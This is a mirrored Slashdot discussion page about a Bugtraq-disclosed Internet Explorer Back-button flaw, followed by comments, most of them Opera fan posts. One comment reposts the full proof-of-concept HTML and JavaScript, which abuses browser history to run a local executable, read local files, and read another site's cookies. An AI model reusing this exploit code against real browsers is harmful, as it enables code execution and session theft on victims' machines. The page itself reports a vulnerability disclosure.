Slashdot Mirror

← Back to Stories (view on slashdot.org)

Don't Hit That Back Button

Posted by ryuzaki0 on from the burn-your-bridges dept.

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

4 of 640 comments (clear)

  1. Proof-of-Concept by acm · · Score: 2, Redundant

    <html>
    <h1>Press link and then the backbutton to trigger script.</h1>
    <a href="javascript:execFile('file:///c:/winnt/system 32/winmine.exe')">
    Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
    <a href="javascript:execFile('file:///c:/windows/syst em32/winmine.exe')">
    Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
    <a href="javascript:readFile('file:///c:/test.txt')"& gt;
    Read c:\test.txt (needs to be created)</a><br>
    <a href="javascript:readCookie('http://www.google.com / )">
    Read Google cookie</a>

    <script>
    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "res:";
    function execFile(file){
    s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
    s+= 'CODEBASE='+file+'></OBJECT>';
    backBug(badUrl,s);
    }
    function readFile(file){
    s = '<iframe name=i src='+file+' style=display:none onload=';
    s+= 'alert(i.document.body.innerText)></iframe&g t;';
    backBug(badUrl,s);
    }
    function readCookie(url){
    s = '<script>alert(document.cookie);close();< "+"/script>';
    backBug(url,s);
    }
    function backBug(url,payload){
    len = history.length;
    page = document.location;
    s = "javascript:if (history.length!="+len+") {";
    s+= "open('javascript:document.write(\""+payload+"\")' )";
    s+= ";history.back();} else '<script>location=\""+url
    s+= "\";document.title=\""+page+"\";<"+"/script> ';";
    location = s;
    }
    </script>
    </html>

  2. Re:Go Mozilla! by croanon · · Score: 0, Redundant

    Come on. Opera is much much much faster than IE. I am using it for quite a long time now. I feel like stupid that I followed the hype and used IE for a long time. If you get used to Opera GUI, (which in fact, I installed AQUA skin last mont. It ROCKS!), you will never turn back to the IE GUI. Believe me. :) Also, Opera has this beautiful feature "mouse movement commands", which I can argue the best extension ever to any web browser ever created. Which make surfing experience 10 times more pleasureable. :)

    --
    Dear Bill, do you have a .net tatoo on your ass for marketing?
  3. Re:Go Mozilla! by croanon · · Score: 0, Redundant

    I've been using Opera for quite a long time, I am very pleased with it. :)

    --
    Dear Bill, do you have a .net tatoo on your ass for marketing?
  4. Re:Go Mozilla! by croanon · · Score: 0, Redundant

    This is simply not true dear Anonymous Coward. :) I am very pleased with Opera's CSS and Javascript support. And, its mouse gestures, and aqua interface, and its speed, and its availability in more than 5 OSs etc. :) Mozilla 0.9 and Netscape 6+ is also nice though. But, IE really, really sucks.

    --
    Dear Bill, do you have a .net tatoo on your ass for marketing?